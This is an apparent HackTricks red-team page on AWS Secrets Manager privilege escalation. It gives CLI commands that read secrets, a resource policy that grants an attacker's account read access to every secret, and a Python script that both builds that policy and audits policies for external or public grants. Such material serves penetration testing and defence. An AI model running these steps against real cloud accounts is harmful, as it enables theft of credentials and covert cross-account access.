AWS - Secrets Manager Privesc


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Secrets Manager

For more information about Secrets Manager check:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

An attacker with this permission can read the value stored inside a secret in AWS Secrets Manager (the `SecretString` field, or `SecretBinary` for binary secrets). If the secret is encrypted with a customer managed KMS key, the caller also needs `kms:Decrypt` on that key.

```bash
aws secretsmanager get-secret-value --secret-id <secret_name> # Get the current version
aws secretsmanager get-secret-value --secret-id <secret_name> --version-stage AWSPREVIOUS # Previous value, if one exists
```

Potential Impact: Access to highly sensitive data stored inside the AWS Secrets Manager service.

warning

Note that even with the `secretsmanager:BatchGetSecretValue` permission, the attacker also needs `secretsmanager:GetSecretValue` on each secret in the batch in order to obtain the sensitive values; `BatchGetSecretValue` alone is not enough.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

With the previous permissions it's possible to grant principals/accounts (even external ones) access to a secret by attaching a resource-based policy to it (`ListSecrets` is only needed to discover the secret names; `GetResourcePolicy` lets you read the existing policy first so you can extend it instead of overwriting it). Note that in order to read secrets encrypted with a customer managed KMS key, the granted principal also needs access to that KMS key (`kms:Decrypt`, granted through the key policy when the principal is in another account; more info in the KMS Enum page). Secrets encrypted with the AWS managed key `aws/secretsmanager` cannot be read from another account at all, because that key's policy cannot be modified.

```bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
```

By default `put-resource-policy` does not reject wide-open policies (for example `"Principal": "*"`); they are only refused when `--block-public-policy` is passed.

policy.json:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<attackers_account>:root"
      },
      "Action": "secretsmanager:GetSecretValue",
      "Resource": "*"
    }
  ]
}
```
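The following is an added example (not HackTricks code and not AWS tooling) that shows both sides of the technique above: generating the `policy.json` for a given attacker account, and the check a defender would run over the output of `aws secretsmanager get-resource-policy` to spot principals that are not in the set of trusted accounts (including the anonymous `*` principal). The account ids, secret ARN and the sample CLI output are constructed for the example.

```python
"""Build a Secrets Manager resource policy granting a foreign account
GetSecretValue, and audit an existing policy for external principals.
Added example; works offline on constructed JSON."""
import json

# Constructed stand-in for `aws secretsmanager get-resource-policy` output
# (the real CLI returns ResourcePolicy as a JSON *string* inside the JSON).
SAMPLE_CLI_OUTPUT = json.dumps({
    "ARN": "arn:aws:secretsmanager:us-east-1:999999999999:secret:prod/db-AbCdEf",
    "Name": "prod/db",
    "ResourcePolicy": json.dumps({
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow",
             "Principal": {"AWS": ["arn:aws:iam::999999999999:role/app", "*"]},
             "Action": "secretsmanager:GetSecretValue",
             "Resource": "*"},
            {"Effect": "Deny",
             "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
             "Action": "secretsmanager:*",
             "Resource": "*"},
        ],
    }),
})


def build_grant_policy(attacker_account: str, resource: str = "*") -> dict:
    """Return the policy document from the page, parameterised by account id
    (assumed to be a 12-digit AWS account id)."""
    if not (attacker_account.isdigit() and len(attacker_account) == 12):
        raise ValueError("AWS account id must be 12 digits")
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {"AWS": f"arn:aws:iam::{attacker_account}:root"},
            "Action": "secretsmanager:GetSecretValue",
            "Resource": resource,
        }],
    }


def _account_of(principal: str):
    """Account id behind a principal string; None for the anonymous '*'."""
    if principal == "*":
        return None
    if principal.isdigit():          # bare account id is allowed in Principal
        return principal
    parts = principal.split(":")     # arn:partition:service:region:account:resource
    if len(parts) >= 6 and parts[0] == "arn":
        return parts[4]
    return principal                 # unknown shape: report as-is


def find_external_principals(policy, trusted_accounts):
    """List (principal, account) pairs from Allow statements whose principal is
    not in trusted_accounts. Accepts a policy dict, a policy JSON string, or the
    full get-resource-policy CLI output (ResourcePolicy wrapped as a string).
    Deny statements and non-AWS principals (e.g. Service) are ignored."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    if "ResourcePolicy" in policy:   # unwrap CLI output
        policy = json.loads(policy["ResourcePolicy"])
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be unlisted
        statements = [statements]
    trusted = set(trusted_accounts)
    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        if principal == "*":
            entries = ["*"]
        elif isinstance(principal, dict):
            aws = principal.get("AWS", [])
            entries = [aws] if isinstance(aws, str) else list(aws)
        else:
            entries = []
        for entry in entries:
            account = _account_of(entry)
            if account is None or account not in trusted:
                findings.append((entry, account))
    return findings


if __name__ == "__main__":
    # Attacker side: write the policy that put-resource-policy consumes.
    with open("/tmp/policy.json", "w") as fh:
        json.dump(build_grant_policy("111111111111"), fh, indent=2)
    # Defender side: audit a (constructed) get-resource-policy result.
    for principal, account in find_external_principals(SAMPLE_CLI_OUTPUT, {"999999999999"}):
        print(f"external grant: {principal} (account {account})")
```

In practice the defender loop is `aws secretsmanager list-secrets` followed by `get-resource-policy` per secret, piping each result into `find_external_principals` with your own account ids as the trusted set; any finding with account `None` is a public grant and any other finding is a cross-account grant that should be explained or removed.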
